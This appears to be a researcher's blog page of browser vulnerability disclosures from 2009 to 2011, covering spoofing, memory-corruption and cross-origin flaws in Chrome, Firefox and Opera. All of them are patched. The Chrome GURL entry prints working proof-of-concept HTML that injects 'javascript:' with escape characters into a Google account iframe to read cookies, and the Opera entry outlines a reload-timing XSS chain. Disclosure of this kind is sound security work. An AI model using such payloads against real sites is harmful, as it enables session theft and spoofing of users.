[CVE-2011-3875] URL bar spoof with drag+drop of URLs


Titre: Google Chrome Location Bar Spoofing using very long string on a web address in the location bar./URL bar spoof with drag+drop of URLs


CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3875


Author: Security researcher Jordi Chancel


UPDATE Link: http://googlechromereleases.blogspot.fr/2011/10/chrome-stable-release.html


Description:

Google Chrome before 15.0.874.102 does not properly handle drag and drop operations on URL strings, which allows user-assisted remote attackers to spoof the URL bar via unspecified vectors.


  • Vidéo de démonstration :

Vidéo Exemple : Google Chrome URL Spoofing Vulnerability using Drag & Drop (User try to drag & drop a selected text into the Location Bar for use Google to search these selected words).


-Security Researcher Jordi Chancel

[CVE-2011-2848] URL bar spoof with forward button / Possible URL Bar Spoofing when history.forward() is ignored using forward button


Issue: URL bar spoof with forward button / Possible URL Bar Spoofing when history.forward() is ignored using forward button


CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2848


UPDATE Link: http://googlechromereleases.blogspot.fr/2011/09/stable-channel-update_16.html


Issue 89564 http://code.google.com/p/chromium/issues/detail?id=89564


Announced: September 16, 2011
Reporter: Security researcher Jordi Chancel
Impact: Moderate
Products: Google Chrome
Fixed in: Google Chrome 14.0.835.163


Description

Google Chrome before 14.0.835.163 allows user-assisted remote attackers to spoof the URL bar via vectors related to the forward button.

Report Description

In some cases,after some window.location=’attacker’ that are used, history.forward() can be ignored.
If the user goes forward on google chrome manually,opens and closes a new tab, Location bar is spoofed


  • Vidéo de démonstration :


-Security Researcher Jordi Chancel

icon_firefox[CVE 2011-2377] Memory corruption due to multipart/x-mixed-replace images

cve2011-2377mfsa2011-21


Memory corruption due to multipart/x-mixed-replace images


Announced: June 21, 2011
Reporter: Jordi Chancel
Impact: Critical
Products: Firefox, SeaMonkey, Thunderbird
Fixed in: Firefox 3.6.18 – Firefox 5 – SeaMonkey 2.2 – Thunderbird 3.1.11


Description

Security researcher Jordi Chancel reported a crash on multipart/x-mixed-replace images due to memory corruption.


CVE Description

Mozilla Firefox before 3.6.18 and 4.x through 4.0.1, Thunderbird before 3.1.11, and
SeaMonkey through 2.0.14 allow remote attackers to cause a denial of service
(memory corruption and application crash) or possibly execute arbitrary code via
a multipart/x-mixed-replace image
.


  • Vidéo de démonstration :


Security Researcher Jordi Chancel

[CVE-2011-1452] URL bar spoof with redirect and manual reload / URL Bar Spoofing using redirection and location.reload()


Issue: URL bar spoof with redirect and manual reload / URL Bar Spoofing using redirect and location.reload()


CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1452


UPDATE Link: http://googlechromereleases.blogspot.fr/2011/04/chrome-stable-update.html


Issue 77786 https://code.google.com/p/chromium/issues/detail?id=77786


Announced: April 27, 2011
Reporter: Security researcher Jordi Chancel
Impact: Moderate
Products: Google Chrome
Fixed in: Google Chrome 11.0.696.57


Description

Google Chrome before 11.0.696.57 allows user-assisted remote attackers to spoof the URL bar via vectors involving a redirect and a manual reload.

Report Description

Click on the button , when you see twitter.com on title of tab , open a new tab , look to the previous tab , the URL Bar show Twitter.com with the previous content.


  • Vidéo de démonstration :


  • Image de démonstration de la même vulnérabilité permettant aussi le spoofing de l’indicateur de connexion sécurisé (SSL/TLS Spoofing) :


-Security Researcher Jordi Chancel

icon_firefox[CVE 2011-0061] Buffer OverFlow/Crash caused by corrupted JPEG image

cve2011-0061mfsa2011-09


Crash caused by corrupted JPEG image


Announced: March 1, 2011
Reporter: Jordi Chancel
Impact: Critical
Products: Firefox, Thunderbird
Fixed in: Firefox 3.6.14 – Thunderbird 3.1.8


Description

Security researcher Jordi Chancel reported that a
JPEG image could be constructed that would be decoded incorrectly,
causing data to be written past the end of a buffer created to store
the image. An attacker could potentially craft such an image that
would cause malicious code to be stored in memory and then later
executed on a victim’s computer.


Firefox 3.5 was not affected by this issue.


  • Vidéo de démonstration :


Security Researcher Jordi Chancel

[CVE-2011-1107] Google Chrome Location Bar URL/SSL Spoofing And Login/Password stealing


Titre: Google Chrome URL Bar Spoofing ( Can be used to steal Login & Password saved into Google Chrome )


CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1107


Author: Security researcher Jordi Chancel


UPDATE Link: http://googlechromereleases.blogspot.fr/2011/02/stable-channel-update_28.html


Description:

Unspecified vulnerability in Google Chrome before 9.0.597.107 allows remote attackers to spoof the URL bar via unknown vectors.


  • Quelques Vidéos de démonstration :

Location Bar Spoofing Vulnerability with Login and Password Stealing.


Location Bar Spoofing Vulnerability And Possible JavaScript code Execution on the targeted website using the drag and drop event of a JavaScript Link into the Location Bar.


  • Image de démonstration d’un autre résultat obtenu avec la même vulnérabilité :


-Security Researcher Jordi Chancel

[CVE-2011-0682] Large form inputs can allow execution of arbitrary code


Titre: OPERA – Large form inputs can allow execution of arbitrary code


CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0682


Author: Security researcher Jordi Chancel


UPDATE Link: http://www.opera.com/fr/security/advisory/982


Description:

When certain large form inputs appear on a web page, they can cause Opera to crash. In some cases, the crash can lead to memory corruption, which could be used to execute code. To inject code, additional techniques will have to be employed.


Opera’s response:

Opera Software has released Opera 11.01, where this issue has been fixed.


  • Vidéo de démonstration :


-Security Researcher Jordi Chancel

Operaico[CVE 2010-4045] Opera 10.62 Reloads and redirects can allow spoofing, universal cross site scripting and Command/code Execution


Opera-web-browser
Bonjour à tous,
Maintenant que notre vulnérabilité de remote code execution sur OPERA 10.62 est corrigée depuis plusieurs versions , nous pouvons enfin dévoiler quelques détails techniques à son sujet.
Le bug en question utilise la vulnérabilité de Cross domain scripting / Cross site scripting d’OPERA 10.62 découvert par Jordi Chancel dans le but d’injecter du code dans les configuration d’opera (OPERA:CONFIG).
L’injection de code sur les configuration d’OPERA est cependant plus compliqué et donne un résultat plus aléatoire que l’injection de code sur un domaine tiers.
Pour une exploitation universelle ( ce qui reste possible avec se genre d’exploit ) il faudrait néanmoins calculer la vitesse de navigation des visiteurs pour définir au mieux le temps nécessaire pour stopper le chargement de la page puis injecter le code malicieux.
Les restriction DEP et ASLR ne sont pas d’actualité pour les vulnérabilité d’exécution de commande ce qui laisse se genre d’exploit relativement dangereux et dans certains cas plus fiable qu’une vulnérabilité de corruption dont les résultats sont souvent plus aléatoires.
La mise en œuvre de cette vulnérabilité est pourtant relativement simple , il suffit de définir un document.write() sur l’évenement OnLoad de la page web , d’y injecter le code nécessaire au rechargement de cette meme page ( RELOAD() ) pour que celle-ci mène à une redirection ( il faut utiliser un langage serveur dans le but de changer le contenu de la page par une redirection au rechargement ).
Pour finir il faut stopper le chargement après un certain laps de temps
| setTimeout(« stop() »,XXXX); |
et donc injecter le code aboutissant sur l’exécution de code arbitraire.


Advisory: Reloads and redirects can allow spoofing and cross site scripting


octobre 6, 2010


Severity: Critical


Description
Scripts on a page are supposed to be restricted so that they can only interact with other pages from the same domain and security context. Carefully timed reloads and redirects, when combined with appropriate caching, can cause scripts to execute in the wrong security context in Opera. This allows cross site scripting (XSS). In some cases, the address bar will also show the address of the target page.


With minimal user interaction, this particular XSS vector may also be used to modify Opera’s configuration, and this may in turn be used to execute arbitrary code on the computer.


Opera’s response
Opera Software has released Opera 10.63, where this issue has been fixed.


[VIDEO1]Code Execution via Opera:config :

[VIDEO2]Address Bar Spoofing and Cross Domain Scripting / XSS

[VIDEO3]Code Execution via Opera:config sur Mac

Vulnérabilité reportée le 14/09/2010 sur Bugs.opera.com

PoC : http://www.alternativ-testing.fr/Research/Opera/Opera Location Bar Spoofing & Cross Domain Vulnerability 10.62/tddsdss6565682147testcase/


-Security Researcher Jordi Chancel

icon_firefox[CVE 2010-2751] SSL spoofing with history.back() and history.forward()


Advisory: Multiple location bar spoofing vulnerabilities

CVE 2010-2751: SSL spoofing with history.back() and history.forward()


Announced: July 20, 2010
Reporter: Jordi Chancel
Impact: Moderate
Products: Firefox, SeaMonkey
Fixed in: Firefox 3.5.11 – Firefox 3.6.7 – SeaMonkey 2.0.6


Description

Security researcher Jordi Chancel reported that
the location bar could be spoofed to look like a secure page when the
current document was served via plaintext. The vulnerability is
triggered by a server by first redirecting a request for a plaintext
resource to another resource behind a valid SSL/TLS certificate. A
second request made to the original plaintext resource which is
responded to not with a redirect but with JavaScript
containing history.back() and history.forward()
will result in the plaintext resource being displayed with
valid SSL/TLS badging in the location bar.


  • Vidéo de démonstration :


Security Researcher Jordi Chancel

[CVE-2010-1663] Google Chrome Cross Origin Bypass in Google URL (GURL)


Titre: Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)


CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663


Author: Security researcher Jordi Chancel


UPDATE Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html


Description:

The Google URL Parsing Library (aka google-url or GURL) in Google Chrome before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy via CHARACTER TABULATION or others escape characters inside javascript: protocol string.


All PoC:
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>


<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>


<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>


<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>


<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>


  • Vidéo de démonstration :


-Security Researcher Jordi Chancel

[CVE 2009-3985] URL spoofing via invalid document.location


Advisory: Location bar spoofing vulnerabilities

CVE 2010-2751: URL spoofing via invalid document.location


Announced: December 15, 2009
Reporter: Jordi Chancel
Impact: Moderate
Products: Firefox, SeaMonkey
Fixed in: Firefox 3.0.16 – Firefox 3.5.6 – SeaMonkey 2.0.1


Description

Security researcher Jordi Chancel reported an issue similar to
one fixed in mfsa2009-44 in which a web page can set document.location to a URL that
can’t be displayed properly and then inject content into the resulting blank page.
An attacker could use this vulnerability to place a legitimate-looking but invalid URL
in the location bar and inject HTML and JavaScript into the body of the page, resulting in a spoofing attack.


  • Vidéo de démonstration :


Security Researcher Jordi Chancel